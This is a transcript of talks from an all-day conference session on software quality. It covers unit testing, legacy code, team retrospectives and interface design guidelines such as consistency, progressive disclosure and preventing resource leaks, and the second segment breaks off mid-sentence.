They exercise exceptional use. For example, I give it invalid inputs. I set things up so that the heap is going to be exhausted. I set things up so that I'm going to get numeric overflow on some of my computations. All the things that are no fun to test because they're not supposed to actually occur while the program is running, but they actually do have to be tested. Steve McConnell says that mature test organizations, they have five times as many dirty tests as clean ones. In other words, they have five times as many tests around the fringe, checking to make sure that all the weird situations which aren't supposed to occur are correctly handled. Then they do tests for the situation which are correctly handled. Programmers usually like to test things which are going to work as opposed to things that are going to fail. Furthermore, if you have a test author, be the same as the person who wrote the code. They bring the same interpretation of the spec both to the test and to the code, which means an outside tester might interpret the specification differently and that could help expose weaknesses in the specification. Programmers need to write unit tests and they do a fine job of doing it. It's just important to bear in mind they don't do the role of professional testers. Testers tend to focus on these other things. Furthermore, unit tests can't replace independent testing. They're actually complementary. Fundamentally, developers do white box testing, they know how the code works. Testers can do black box testing. We also know that if I have multiple methodologies for accomplishing something to identify defects, such as testing, I'm going to get more defects discovered if I combine them than if I use either one of them independently. If you have programmers doing some testing and you have testers doing some testing, you're going to get better coverage in terms of identifying defects than if you have only programmers or only testers identifying defects. Having said that, unit tests could reduce the time and the cost of conventional testing simply because fewer bugs should be downstream for testing to identify, assuming that developers have done a decent job of unit testing upstream. Yeah? Would you say that, well, many of the cases that you just mentioned, like also in the previous action, actually being in the unit tests, eventually, you know the developer may not have enough? The question is that a lot of the dirty things that I talked about, for example, invalid inputs, forced overflow, heap exhaustion, yes, ideally those should be part of the unit tests. It just turns out that programmers in general don't tend to want to test those edge case conditions as well, but they certainly should be part of. In order to convince yourself as a developer that your component works correctly, you have to check those edge conditions as well. You'd ideally like to also test the exceptional conditions, like I run out of memory or I run out of threads or whatever it happens to be. Yes, I agree with you. So, the guideline is to embrace automated unit testing. Any questions about unit tests, TDD, the advantages that you can accrue from them? Yeah? I'm sorry, can you please speak louder? Okay. Quit. Okay, so the question is, my manager comes to this meeting, he goes, great, unit tests are wonderful, tells me I need to write unit tests for the 100,000 functions in the code base that we've been maintaining for the past 20 years. What should you do? Well, you heard my advice, but let me generalize your question slightly, which is, I have an existing code base, a very large code base. It wasn't developed with unit tests, so what should our approach be to adding unit tests to an existing code base? Is that a reasonable alternative question? Okay. For things like this, I really like the approach that Michael Feathers takes in his book. He wrote a book called Working Effectively with Legacy Code. And he has an interesting definition of legacy code. His definition of legacy code is code that has no unit tests. So if you wrote the code 30 seconds ago and it has no unit tests, that's legacy code from his perspective. And so essentially his argument is, if you have code that's already an existing code base and as far as you know it's working fine, then there's no compelling reason to go and add a bunch of unit tests to it. Because there's been no evidence that it's going to need to be modified. But from time to time, you're going to discover bugs in the code, or you're going to find places where you'd like to do some refactoring, or you're going to want to add features. I mean you're going to go back and you're going to revisit this code from time to time. And his argument is, at the time when you are going to make some changes to the legacy code, then what you want to do is start imposing unit tests around the part of the code that you're going to change. Because you want to make sure that when you change something, you don't break any other functionality inadvertently. And he described this as you have a sea of legacy code with no tests, and over time little islands begin to pop up where they have put in some unit tests. I think this is a very pragmatic, practical approach to introducing unit tests to an existing code base, which is basically you only do it at a time when you're going to need to modify the code anyway. Because once you've modified the code, you're going to have to verify that it does the right thing. So does that seem reasonable? So I'm pretty sure that the book is listed in the reading, but I'm not sure. If not, it's by Michael Feathers. It's called Working Effectively with Legacy Code. So the next topic I want to talk about is to perform retrospectives. A retrospective is a mechanism for learning from something you've done in the past. Basically the idea is you're developing software. And maybe you're at a point now, for kicks, we'll talk about the end of a project. The project is done, and now what you want to do is you want to take some time and step back and say, what can we learn about software development based on our most recent experience? And typically what you're trying to figure out is what worked well, because this is stuff that we want to make sure we're going to do again in the future. So what were some ideas that we came up with that we think are worth keeping? Really focusing on ideas that might otherwise be forgotten? Or you also want to identify things that should be done differently. For example, what did we do that really didn't bias anything? Because we want to stop doing that. Or what did we do that didn't work as well as we would have liked? Because we want to change the way that that works. Ideally you want to identify what worked so we don't forget, what didn't work so we don't keep doing it, and what needs to be changed. Now those are the two technical aspects of retrospectives. Everybody agrees on those. If you look in the Agile community, everybody's talking about that kind of stuff as well, which is completely applicable. But there is an important component that also has to be taken into account, which is a social component. At the end of a large work unit, so for example the end of a project or a major release, in addition to having a technical artifact, you have people who worked on the technical artifact. And especially if the process of producing it was not necessarily as pleasant as it might have been. Those people need to deal with those issues in some way so it can help the participants achieve effectively closure in one way or another. Work is a really important part of people's lives. And so if you finish a project and it was very, very successful, it's kind of like having your child go off to college. And if you work on a project and it didn't go very well, it's kind of like having your child flunk college, I guess. So that's something which needs to be addressed in some way if you want those people to continue to perform at the highest possible level in their software development. So retrospectives allow you to address both technical issues but also social issues. Retrospectives, the purpose of them is to lay the groundwork for an improved software process in the future. You want to improve the development process both technically and socially. Norm Kirth, who wrote a book on retrospectives, and I'm going to be basing my presentation largely on what he said, he calls it the single most important step in process improvement which may be a little bit self-serving since he wrote a book on it. But it does enable people to focus on the future and put their problems in the past. Now retrospectives have a really good cross-disciplinary track record. They're used in athletics all the time. Why did we win the game? Why did we lose the game? The military, why did we win the war? Why did we lose the war? Medicine, why did we lose the patient? The notion of experience reports is all about what worked and what didn't. And they're also one of the 12 Agile Manifesto Principles which says that at regular intervals the team reflects on how to become more effective, fine-tunes and adjust its behavior accordingly. So there's a lot of evidence that retrospectives are a positive way to improve software development. They help through the process of learning. Now experience is something which comes automatically, if you do some stuff by definition you get experience. But learning is something that comes about through reflection. Retrospectives basically force you to think about what you've been doing and whether it was effective. In many people's experience the only time software developers really stop and think about how they produce software, about what works and what doesn't work is during a retrospective because the rest of the time they're so busy trying to produce software. They just don't have time to think about it. If you don't stop from time to time and think about what you're doing and try to figure out a better way to do it you're unlikely to change things. As they say, if you always do what you've always done you'll always get what you've always gotten. Retrospectives also permit hidden issues, a chance to surface, and they help build an institutional memory. You want to remember what worked on these projects and why and what did not work and why not. The justifications are particularly important because as time goes on it may turn out that the reasons for things working or the reasons for things not working change. You want to have made note of why they worked or why they didn't work. Actors can also help in terms of building a software development team by facilitating behavioral change. It turns out that unresolved issues actually hinder behavioral change and people tend to embrace the practices that they help establish. If you can explain to people why they need to do something and especially if you feel like they had a role in making those changes that encourages them to adopt different kinds of behavior in the future. One manager who I talked to says retrospectives are the best tool for getting team buy-in on change. So if you can get people talking about what's working, what's not working, let's do things a little bit differently that can help you change the way you develop software. The time to hold retrospectives depends on what you're trying to accomplish but logically it's at the end of any logical work period. For example, the end of a project is a reasonable time to hold a big retrospective. You could also have a lesser retrospective at the end of a milestone and at the end of an iteration or the end of a sprint which some of the agile methodologies advocate. The important thing is they need to be included in the schedule. If they're not included in the schedule, they're not going to take place. Nobody has a bunch of extra time. The longer the work period, the longer the retrospective that you should have. So for example, if you had a month-long iteration, maybe a retrospective for a couple of hours would be fine. If it was a 12-month project, you might need something as long as two or three days, assuming there were a lot of people involved to really be able to figure out what worked and what did not work and how you can do better in the future. You're not likely to get much of meaty retrospective in a stand-up meeting. It's not really the kind of thing where you do it that way. The duration is also going to depend on the size of the team, the project complexity, whether the team is distributed, a lot of factors enter into it. And the sooner after the work period, the better because people forget things. They focus on new tasks, that kind of stuff. So you really want to be able to get people to talk about how the project went or how the iteration went or how the milestone went while it's still fresh in their minds before you move on to do additional things. Now I'm going to be talking about an approach to retrospectives, but I'm going to tell you right now that it's kind of a heavyweight approach to retrospectives. There's two basic schools of thought for retrospectives these days. The heavierweight approach, which I'll be talking, which was described originally by Norm Kearth, is based on the assumption that there's been a fairly large amount of work by a fairly large number of people. So it might have been a 12-month project or maybe a 15-month project, and there might have been a couple of dozen people involved. Where the people involved are the programmers and the testers and the people who were doing the requirements and just everybody involved in the software. At the same time, I recognize that a lot of retrospectives are now done in the form of agile methodologies. So you have a sprint, which maybe is going to be a couple of weeks, or maybe it's going to be a month. And as a result, you can have retrospectives much more frequently. Having said that, it is increasingly becoming recognized that even if you have a project, let's say that lasts 12 months, and it's using some kind of an agile methodology. So every two weeks or every month you're doing a little bit of a retrospective, it doesn't change the fact that at the end of that really long period, you need to have a meteor retrospective. So even the agile methodologies are going to recognize that occasionally you do need a heavier weight retrospective, especially at the end of a longer period of time. So like I said, I'm talking about retrospectives in general, but the focus I'm taking is a little bit more on the heavyweight versions because I think that they don't get the attention that they deserve. The people who need to participate in the retrospective, fundamentally it's a representative of all the relevant parties involved in the project. Norm Kurth talks a lot about what he calls the full story. The full story is essentially everything that happened that went into the process of making the software. It would include specification, development, testing, deployment, delivery, satisfaction of customers, everybody involved there. And you want to get the full story, which means you need to get representatives from all these important parties. The more information you get, the more you can learn. And remember, the whole purpose is learning. So for example, party A can learn why party B behaved the way that they did. So you might find out that the people writing the specifications were really insistent on something and the people doing the coding couldn't understand why they were behaving that way at a retrospective they should be able to find out. So possible parties would include customers, requirements analysts, developers, testers, managers, and then in the more formal retrospectives, you want to have a facilitator. And a facilitator ideally is somebody who is skilled at working with groups of people and who is neutral and who is a trusted party by everybody who's going to be there. Because sometimes issues come out that need to be discussed and it can be a little bit, there can be some tension. Ideally there should also be somebody to take notes, formally called ascribed. Shouldn't be the facilitator, their hands are busy doing something else. You don't want to lose the information. One of the most important things about a retrospective is this notion of safety. Now the purpose of a retrospective is to figure out what worked and what didn't. Sometimes describing what didn't work especially can potentially hurt people's feelings or can potentially lead to bad feelings of one form or another. But it's really important to find out that something did not work effectively. As a result it is very important that people can express themselves without feel of repercussions because if people suppress information you're losing part of the story. It is therefore up to the facilitator and the participants to work to maintain safety and this leads to what Norm Curth calls his prime directive. Everybody who is participating in a retrospective has to agree to the following, not necessarily explicitly but this is the philosophy you need to have. That regardless of what we discover we understand and we truly believe that everyone did the best job they could given what they knew at the time, their skills and abilities, the resources available and the situation at hand. In other words you go into a retrospective with everybody saying listen I take it for granted everybody did the best that they could. Nobody was trying to sabotage the project and this is true even if the project was a success. Because the goal of the game is to learn, it's not to blame and the ultimate goal is to improve things, it's to be constructive. If you don't have safety, if people cannot speak freely or express their opinions without fear of repercussions you're not going to get anything out of a retrospective. So the phases of a retrospective there are three of them. First there's some preparation prior to the meeting, you have to determine what are the objectives in our retrospective, what are we really going to be focusing on here and then you gather some data and you gather artifacts which may be relevant. At the meeting itself you create and you discuss the project record so basically you talk about what happened on this project, what did we do. You then prioritize the topics that you want to talk about during the retrospective and you analyze the ones that are most important. Because the goal is learning and you want to figure out what worked, what didn't, what needs to be changed, you need to figure out okay if something needs to be changed how is it going to be changed so you develop some kind of an action plan and then you perform a retrospective on the retrospective. You ask yourself what worked, what didn't work, how can we improve what we did. And then there has to be some follow through. If you have some action items you need to make sure that they have follow through to make sure that those things are really pursued. If you have a retrospective and come up with some ideas on action plans and nobody follows up on those people are going to lose faith in the process of retrospectives, they're going to be less inclined to fully participate in the future. So I want to talk a little bit more about these different phases. There's the meeting itself. It is interactive, it is participatory. It's very important that this is a meeting to try to get information to come out. This is not a presentation. So Ellen Godesiner, she calls them a workshop as opposed to a meeting. It has been commented that if you see somebody show up at a retrospective and the first thing you want to do is show PowerPoint slides, that's a really bad sign. That's not what it's about, it's some kind of a presentation. The people who do retrospectives professionally will often incorporate what they call exercises. The exercises are designed to first establish and maintain safety, to bring out important lessons and to allow difficult topics to be discussed. Basically, the facilitator is setting up an environment that is most likely to lead to useful information coming out of the retrospective. Now I want to talk a little bit about this notion of exercises that can improve the retrospective. I'm going to give you two, or maybe only one, I'm not quite sure, either one or two sample exercises. I can't remember how many I have in the presentation now. The first one is called Timeline. Timeline is a way to combine everybody's view of the work period under review. This is especially useful for big retrospectives. The idea here is that you have a lot of people who worked on the project, where a lot might be 12 to 15, and nobody knows everything that went on in the project. The first thing you do is build the timeline. What often happens is they'll put up a big piece of paper on a wall, or there can be a whiteboard, and then everybody gets to go up, and it's particular points in time that are marked on the board or on the paper. You get to say when important things occurred. This is when the build first succeeded. This is when we found out that the unit tests were not being run, and we thought that we had better coverage than we did. People write down whatever events they consider to have been meaningful during the course of the project. The meaning of a significant event is determined by the participants. They can write down whatever they want to. If somebody wanted to write down, this is one we all went to dinner at the Chinese restaurant, they get to write that down if that was significant to them. Each event can go on an index card or a sticky note, or you can just write it on the whiteboard if you want to. The events themselves get to be anonymous in many cases, because that way if somebody comes along later and says, oh, I see that somebody wrote that this is when somebody broke the build, and they didn't want to say who wrote that. It needs to be that issue is something which was important enough to the person to put on the timeline. It probably needs to be discussed. After everybody has gone up and written on the timeline, put all the significant events that they consider to be relevant, then there is time for viewing and reflecting on all of the events. Norm Kurth doesn't actually name this, I called this considering. That's a time when you get to look at what everybody else said. So this is the first chance for everyone involved to look at all of the comments that have been made by everybody and potentially discover some things which they had not realized. And after that becomes the discussion, which is what Norm Kurth calls mining for gold. What you're trying to identify is, okay, what worked well that we don't want to forget? Let's write that down. What should we do differently in the future? What didn't work as well? What do we need to change? And at that point, great, what should we continue discussing further in this meeting? How are we going to spend the rest of the time? So this is Norm Kurth's timeline exercise, again, most useful for large retrospectives. When the reading is over, when the retrospective is over, you should have some concrete results. They should include the things that worked we don't want to forget, maybe document those as patterns for the institutional memory. Things we want to do differently in the future, maybe you want to add some things, maybe you want to modify some things, maybe you want to abandon things. Interestingly, it may turn out that some of the things that you abandoned are things that you had noted in the past were really being helpful. Something which worked in the past may not work as well in the future, either because the people are different or because circumstances have changed in one way or another. You may want to have a list of things that require additional research. We want to know why certain things occurred during the software development process. We didn't understand. And you also want to have some specific action plans. Now, the action plans need to be specific. So now we know exactly what it is we're trying to accomplish. And you only want to have as many as can reasonably be accomplished soon. A laundry list of, here's 22 things we'd like to be able to change, that's not really actionable. You want to have a comparatively small list of things that can reasonably be accomplished soon. Somebody has to accept responsibility for every one of those action items because if you have an action plan and nobody follows up on it, as I said, that's just going to demoralize people and sour them on the idea of retrospectives. Unsurprisingly, retrospectives end with a retrospective. So the meeting ends, figuring out what worked well, what should be done differently in the future, how can we run better retrospectives. Now, I've already mentioned that with follow through, it's very important that somebody follows up on those action items. I've already mentioned too that if the retrospective results are ignored, then participants lose faith in the retrospectives. But more importantly, things that worked may be forgotten and not done again, and things that didn't work may be forgotten and therefore done again. So you definitely want to have some follow through here. Recently, Norm Curth has talked a little bit what he calls a kickoff retrospective. Now, a retrospective is something you do at the end of a project to figure out what worked, what didn't. A kickoff retrospective is completely different. It is used before you start the work, and it is based on the fact that what you do is you get a bunch of people together who are going to be working on a new project, so there's no history yet. And what you say is, in the future, when we look back on this project, what was so good that we want to repeat it on future projects? So you're sort of saying, if in the future you look back on this, what do you want to be able to say we did so well that we're going to want to repeat it? Because most people involved in software projects have worked on other software projects in the past, they already have some experience. They know what worked, they know what didn't work, so you're essentially saying, how shall we plan this project based on your experience on what worked on previous projects? It's also kind of nice because it's an initial meeting where the people working on the project get to say, this is how we want to run this particular project. So the guideline is to perform retrospectives. Any questions about retrospectives? Yeah. The timeline exercise, if it's a 12 month project, and they remember the things that didn't. Okay, so the question is, okay, let's suppose it was a 12 month project and you put together this timeline, people aren't going to remember what happened over the course of 12 months. When you're doing the timeline, especially for a long project like that, what you would do is you would tell people, look, we're going to be holding a retrospective, it's going to cover the full 12 month period. So we would expect you to review your notes, review maybe some email records, maybe look at when things were checked in. So people actually have a chance to refresh their memory and gather some data and gather some information before the retrospective. You don't simply say, why don't you show up and let's talk about what happened 12 months ago. So that was actually, I didn't so much skip over it, but I didn't mention it very much, but it had to do with, in the preparation prior to the meeting, it's the gathering of project data and artifacts. So you actually give people some warning, this is what we're going to be doing, and like I said, then they can refresh their memory about things that are relevant during that time period. Does that help a little bit? Yeah. Other questions on retrospectives? Right. Okay, so the question is, all right, so let's suppose we've had a fairly long project and maybe there were some things done at the beginning of the project that didn't go as well as it should have, but by the time the retrospective rolls around, we've forgotten about that, and so it doesn't get brought up. The purpose, I mean, presumably you're dealing with little issues as they arise during the course of developing the software anywhere. Anyway, the retrospective at the end is ideally a situation where people get to say, listen, these are the things that I think are relevant taking the entire project experience into account. So for a kind of a problem that occurred early in the project, what I would say is either that issue had ramifications so that at least one person at the retrospective still wants to talk about it, in which case they're going to bring it up. Or it turns out that that mistake that occurred early on in the project in the long run of the whole project was not significant enough for anybody to want to bring it up at the end. So the idea, I agree, there's going to be a natural tendency to talk about little things that occurred recently just because they're recently. But a good facilitator will try to say, listen, we're trying to focus on the project as a whole. We're trying to identify broader lessons that we can use on big projects like that. Does that help a little bit? Okay. Yeah. Okay, so the question has to do with can you sort of treat retrospectives like performance evaluation, like people have to treat? Okay, so the question is, could you treat performance reviews for individuals sort of using the same methodology as this? You know, I'm actually going to punt on that question and say I don't know because I haven't had to deal with performance reviews before. I focus more on software than on that kind of stuff. So I'm just going to have to answer with I don't know. I'd hate to give some misleading advice only to turn out that it was a horrible piece of advice. Sorry about that. Okay, what I want to do is talk about some things we would talk about if there were more time. We've only got one day. One day is not a lot of time to talk about how to write better software. If I had more time, I'd talk about things like minimizing coupling. I'd talk about things like ensuring that inheritance corresponds to substitutability. I would talk about things like how defect cause analysis can fuel defect prevention. I'd talk about sweating the small stuff. I mean, there's a lot more that we could talk about. I'd talk about performing usability tests. Great book by Steve Krug called Rocket Surgery Made Easy, which I'll give you a reference to, which talks about that. But we've only got a limited amount of time. So instead, what I want to do is I want to talk about you. I want to talk about the people in this room. And I want to tell you, you know, you're all special, everybody's special, but you're not that special. I mentioned this morning at the beginning that by the end of the day, my suspicion was that most of you are going to say, OK, well, I saw some things that were new, but there was some stuff I also hadn't seen before. My experience is that most developers recognize that the guidelines are usually valid. But at the same time, they say, you know, you're right, we should do those things, but we can't. And the reason we can't is our schedule is too aggressive or performance requirements, they're too great or our memory constraints are demanding, our platforms weird. Everybody's got an excuse. I've been doing this for a while, a couple of decades. And experiences taught me and taught my clients that the guidelines apply even if 32 bits is too small an address space. Even if the technology they're working on is changing really, really quickly. I have worked with many companies who have told me, well, this code will never have to port. That's because they have their own custom hardware. They have their own custom operating system. Aside from the fact that the code always has to port. It turns out that the guidelines that we're talking about here apply. A significant new version of the software has to be released every year. Think about video game manufacturers who either are trying to release a video game in time for Christmas or writing a sports franchise and it needs to come out at the time the season begins, because Christmas is not going to slip and neither is the beginning of soccer season. So people have to deal with those kinds of things. I have worked with people where program runs extend for months on the fastest available hardware. It was an eye-opening experience for me to work at one of the research labs for a while where they routinely talk about how many CPU months their programs take. So the thing is, following the guidelines is not that hard. It's just kind of inconvenient. Let's face it, specification free hacking, that's really convenient. The freedom I can do whatever I want. I have no specification. Quick and dirty interfaces are really convenient. Copy and paste, there's a reason why it's a single key. It's so convenient. Skipping configuration of lint-like tools, very convenient. Avoiding retrospection, really convenient. These things are all convenient. Bug reports, inconvenient. Wack-a-mole debugging, inconvenient. Working with incomprehensible code, that's inconvenient and unpleasant. Slip schedules are inconvenient. Unhappy customers are inconvenient, although in fairness, let's be honest, customers are inconvenient. Making the same mistakes on every project is really frustrating. You have to keep making these same mistakes over and over. The inability to add simple new features is just plain embarrassing. I mean, really, somebody asks you for something simple and you just can't do it. Convenience is not a good excuse for poor software development practices. Some things aren't as convenient as we would like, but there's good reasons why they're less convenient. Now, the principles behind what I'm talking about are fundamentally universal. They apply almost all the time. So here's a fundamental principle. Think first, do second. That's what specifications and TDD are all about, figuring out what you want to do before you do it. Prevent errors instead of making them and then fixing them later, which is what motivates good interface design, the aggressive use of static analysis, avoiding invisible keyholes, that kind of thing. Retain flexibility. This is why internal quality and unit tests are really important. They preserve flexibility to change things. And improve what you do based on your experience rather than just doing the same thing all the time. That's what retrospectives are about. These are pretty fundamental principles. So the guideline is that you should remember, I mean, you're special, but you're not so special that the guidelines don't apply to you. And if we summarize the day, this is what we come up with. Software quality is a global optimization problem that's based on both external and internal characteristics. So we have to care about internal and external quality and its global optimization. And management of programmer discretion is critical to software quality because programmers have a lot of decision making ability that they are going to exercise. The guidelines I talked about were number one to insist on a useful specification. We talked about how that can be formalized to things like unit tests or designed by contract. I spent a lot of time talking about making interfaces easy to use correctly and hard to use incorrectly. We talked about the importance of static analysis both by machine and by humans. I talked about avoiding the introduction of keyholes, unjustifiable constraints. We talked about minimizing duplication of both source and object code. We talked about embracing automated unit testing and finally performing retrospectives. And then I tried to convince you that really, I'm talking to you, not talking to anybody else, just you guys. We talked about a lot of different topics here. So general information about quality code. Steve McConnell's book I referred to a couple of times, Carl Wieger's book. I'm not going to read, this goes for many pages, so I'm not going to read this to you. Designed by contract and assertions, interface and API design, we talked about that. User interface design, template metaprogramming, that's for the C++ people in the crowd. Everybody else stay away. A lot of references for static analysis. Static analysis by machines. More static analysis by machines. Still more static analysis by machines. By machines for dynamic languages. Dealing with lint output. Static analysis of object code. Static analysis by humans. I like static analysis. More static analysis by humans. There's a lot that you can read. Keyholes, not much on that because nobody cares about me. At this location here you're going to find the draft chapters of a book that I was going to work on. It's an abandoned project now, but I still feel, as you can probably tell fairly strongly about the topic. This is about duplication, both source code duplication and object code duplication. The pragmatic programmer, this book here is what popularized the dry principle. This is some information on aspect-oriented programming. Some interception, which is an approximation to aspect-oriented programming. Unit testing and test-driven development. Some information there. Some more information there. Some information on testing concurrent programs. Some stuff on refactoring. And some information on retrospectives. I told you there were a lot of topics. Some information on retrospectives. Some more information on retrospectives. And some information on usability testing. Just out of curiosity, how many people have been here the entire day? So I feel badly for you. I mean, you wasted the whole day. But I have a little something for you. If you would like a PDF copy of the handout, so all the slides that I showed here, then send me some email. That's my email address. I hope I spelled it correctly. Basically, all you have to do is say, you said that if I sent you email asking for the handouts, then you would send me the handouts. And if you send me that mail, I will send you the handouts. So I felt badly that they did. I actually thought the conference was going to make them available to you anyway. So there was just kind of a misunderstanding there. So any questions about anything to do with any of the topics that we talked about today? Yes. Do you have any measures on the problem that affects better quality for using holders? Okay, so the question is, do I have any data or any measures on how much better your software is going to be if you do all of the things that I talked about here? The short answer is no. But there is data on certain aspects. For example, you can find empirical data about the percentage of defects that can be identified by static analysis, both by machines and by human beings. If you want to read about useful specifications, there's a lot of literature about the importance of improving specifications and stuff like that. So each of the individual topics, if you look up, except for keyholes, you're going to almost certainly find some empirical data. So that's the best I can offer you there. Alrighty, so that is the presentation. Thank you very much for spending the day with me. Given that there were seven competing tracks and so many people spent the entire day here, I am truly honored. So thank you very much. Please fill out. I'd like to see you flight your evaluations, but please choose your colored cards and drop them in the bin at the back. Thank you very much.
|
Automating Unit Tests
|
10.5446/51509 (DOI)
|
If one of the people sitting on the unbelievably comfortable concrete would prefer to move to a seat right there, which is probably less comfortable because it's got all that cushioning and it sits up higher, there's enough room for one person to do that. Okay, since this is the only all-day session running at the conference, I will mention again this is part three of an all-day session. You should be able to follow along even if you haven't been present for the first two sessions. We are talking about ways to improve interfaces at this point, and in particular we're talking about what I consider the most important design guideline, which is how to make interfaces easy to use correctly and hard to use incorrectly. Before the break, we were talking about the importance of consistency. I gave an example of inconsistency here between what the software says and what the hardware says as to where you're supposed to deposit things. We talked about Java had three different ways to find out how many elements were in a container. Microsoft optimized that to only two different ways to figure out how many elements were in a container. Then I explained that sometimes it has unanticipated consequences such as even people who thought, well, I'm always going to be using an integrated development environment thought were surprised to find out that that complicates reflection-based code. It's not entirely fair that I'm picking on things like Java and C-Sharp because really there are so many other things to pick on. Let's go back to C. Let's go to the beginning to C. It doesn't get much older than that in many cases. In the C standard library, you've got some members of the standard library where the first parameter is a file pointer. Nice and consistent. First parameter is the file pointer. That's great. That's as big as the library was because the problem is that other parts of the library, the file pointer is the last parameter. If you talk to experienced C programmers, people who have been programming in C for 20, 30 years, they will tell you they still have to look it up every single time to find out what's going on. It has been remarked that this inconsistency has frustrated millions of developers for more than 30 years. If you think about it seems like such a little thing, what is the order in which we put the parameters? If you are so lucky as to design an interface that is still being used 40 years from now, do you really want to be remembered for something like this? This is not what you should be aspiring to. At the time it probably didn't seem like such a big deal, but when things are successful and we all would like our things to be successful, they should put their best foot forward and this is inconsistent. This is from the C++ 98 standard library. If you want to eliminate all the elements in a particular container with a given value, if your container is a set, you call erase. If your container is a multi-set, you call erase. If your container is a map, you call erase. If your container is a multi-map, you call erase. Yes. If your container is a list, you call remove. Okay. Now if we look at the C++ 98 standard library, we find a different kind of inconsistency that nevertheless is problematic. So in the C++ 98 standard library, there is a function called sort. And sort will run in n log n time or your code will not compile. The underlying principle here is if you ask us to do something and we can't do it efficiently, we're not going to compile it. All right, that's a reasonable principle. However, there is another function in the standard library called binary search. Binary search will run in log n time, which is what you would expect from a binary search if it can. And if it can't, it actually runs in linear time, strangely enough. And you should see the way that they specify that to avoid having to look like their complete liars. Now this philosophy says we will do something no matter what it takes regardless of how slow it is. That's also a legitimate principle. The problem is when you have both of these principles in the same library at the same time, you end up in a situation where programmers don't know if they call a particular standard library routine, whether it's going to compile, and if it does compile, whether it's going to be fast. That doesn't help anybody. Again, this is not a syntactic thing. This is more of a principle that was not applied consistently. So the issue of consistency arises in a lot of different forms. So something else from the C++98 standard library. There is a function called sort. It is not guaranteed to be stable. For what it's worth, sorts can be either stable or not stable. The difference is not important. You just need to know that there are two possibilities, stable or not stable. So sort is not guaranteed to be stable. If you need stability in your sorting, no problem. There is a different function. It is called stable sort. Stable sort is guaranteed to be stable. That seems pretty reasonable. And then there is a member function called sort in the list class. It's called sort, and it's guaranteed to be stable. So this sort, not guaranteed to be stable, this sort is guaranteed to be stable. Again, it's not that difficult to choose an appropriate name. Remember I told you that choosing good names is really important. This is a case where one could easily imagine for somebody familiar with calling stable sort, they would assume that this version of sort is not stable, simply because things are inconsistent. Another technique that you can use to make your interfaces easy to use correctly and hard to use incorrectly, and remember the higher level design guideline we're talking about is making interfaces easy to use correctly, hard to use incorrectly. What we're talking about are different ways that you can go about doing that. So we've talked about consistency, and now I'm talking about progressive disclosure. Fundamentally progressive disclosure is about presenting options to people in a way that avoids overwhelming them with choices. The more choices you give people, the higher the likelihood they're going to accidentally choose the choice that is inappropriate. So you don't want to overwhelm people with choices. Fundamentally, what you want to be able to do is distinguish normal options from expert and advanced options. Statistically speaking, most people aren't experts. They don't want to do the most advanced stuff in the world. There are many examples of how this is done correctly. So as an example, this happens to be from Firefox. So here in Firefox, if I'm under the content tab, then these are the choices I have available to me. But it turns out there's additional choices. But if I want to get at them, I click on advanced, and then I can come over and I have some more options here. But what that means is that users are not shown all these options simultaneously. They are encouraged to limit themselves to these options, and they only get these options if they expressly ask for them. When you have partitioned things appropriately, people should be less likely to get into trouble by fiddling with this stuff when they should be fiddling with this stuff. So that's progressive disclosure. Now it is important to recognize that simply partitioning things does not correspond to progressive disclosure. So for example, this is from a program called Super. Now it has these lovely laid out areas. So things are nicely divided, but there's no progressive disclosure here. Every option is sitting right in front of you. And similarly, this happens to be iTunes, but there's not really progressive disclosure here either. It's divided into various tabs that's categorization. But on every tab, every option you have available is available to you. Categorization is great. I'm not opposed to categorization. It's just important to recognize categorization is not progressive disclosure. Progressive disclosure is not based on dividing things into equal categories. It is divide. It is designed around the idea that some things are more likely to be needed to be addressed than others. And the things that are more likely to be needed to be accessed by users are the ones that should be presented first. This is also applicable to class and library design. What you could do is if you have an API, if you have some interface, you could imagine breaking it into the functions people are more likely to want to call and the functions people are less likely to want to call. Now, Ken Arnold had an article called Programmers Are People Too. This was published in 2005. And his central thesis in that article was we go to a lot of work in user interface design to encourage people to make the right choices and stay away from the wrong choices. And yet we handle, we hand, we give developers these giant APIs where there's a whole bunch of methods or a whole bunch of functions all at the same level. And we basically say, so here are some functions, use the right ones, even though it is much more likely than others that some functions will be useful. And he gives us his example. In Java Swing JButton class, there's over 100 methods. But it turns out that typically people only want a very small minority of these 100 methods. So essentially giving people who use the button class 100 different methods just encourages themselves to get in trouble. It doesn't distinguish between the methods you probably want to call from the methods you don't want to call. And he offers as a design that what you do is you retain a few commonly used methods in the JButton interface. So the interface immediately shrinks much, much smaller. Those are the things most people are going to want to use. And then he says, take for example the button tweaking functionality that tweaks exactly the way the button looks and put that into an object that is accessible by, for example, a JButton get expert knobs. What this would mean is if you wanted to work on this special functionality, you wouldn't be able to call directly to the method. You'd have to call and get an intermediate object, which itself would offer those methods. So you'd have to take an additional step to get at the more complicated methodology. Similarly for integration functionality, which has to do with integrating JButton with other parts of the system, offer a get integration hooks method and remove that from JButton. So everything is still in the interface. Users can do just as much as they could do before. The difference is that when they look at the interface, they say, oh, here's the small set of methods I probably want to call, and here are two additional objects I can access if I need advanced method functionality. It naturally encourages users to focus on these methods, which are the ones you probably want to use, and don't be distracted by all those other methods that you probably don't want to use. And the result of this would be an interface that would be easier to use correctly and harder to use incorrectly without losing any functionality. The next thing you can do to make interfaces easy to use correctly and hard to use incorrectly is to prevent resource leaks. Any time you tell people, so do this and later do that to get rid of the resource, there are two possible problems. Any interface that looks like this. There's a resource, and you say, OK, I'm going to get the resource, and later on I have to release the resource. Any interface, and it doesn't matter what the resource is. The resource can be memory, the resource can be a file handle, the resource can be a mutex, the resource can be a font handle, any resource, where you ultimately have to release the resource later. If you have this kind of an interface, you have two problems. Number one, whoever gets the resource can fail to release it. They can call it zero times. That's normally called a resource leak. Problem number two, they can't count, which means they release it more than once. So problem number two is they make more than one call, in which case you might get a runtime exception, you might get undefined behavior. Anybody who's ever had the problem, for example, of dealing with mutexes, if you acquire a mutex and you never release it, kind of bad. If you acquire a mutex and you release it more than once, equally bad on many platforms. So you would like to avoid those kinds of problems. Any interface that has this characteristic that says once you've done this, later you have to do that, immediately has a problem. Now, one way to resolve this problem is whenever you can, when somebody wants a resource, what you don't do is you don't give them the resource. You actually return to them a resource manager. And the resource manager object automatically manages the resource's lifetime, such that the person using the resource simply doesn't have to worry about it. The simplest way to implement this under the hoods usually is to do the timing of resource release based on reference counting. And fundamentally, under the hood, you're counting how many references refer to the resource. When there's no more references to it, you can automatically release the resource. It's a little bit different from garbage collection because garbage collection doesn't release things deterministically. For example, you would like to release a mutex as soon as you possibly can, not at some point after as soon as you possibly can. This is a common thing in C++, although arguably that's because we don't have garbage collection. It's based on automatic deterministic finalization. In other 